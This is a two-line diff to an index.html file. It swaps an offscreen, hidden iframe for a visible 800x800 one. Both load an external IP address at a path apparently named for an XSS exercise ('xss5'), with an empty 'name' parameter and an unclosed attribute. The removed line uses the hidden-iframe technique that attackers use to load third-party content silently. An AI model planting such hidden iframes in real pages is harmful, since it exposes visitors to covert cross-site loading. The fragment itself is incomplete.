--- a/index.html
+++ b/index.html
@@ -1,2 +1,2 @@
-<iframe style="position:absolute;top:-9999px" src="http://54.37.156.50:5000/xss5?name=
+<iframe height="800" width="800" src="http://54.37.156.50:5000/xss5?name=
 </iframe>
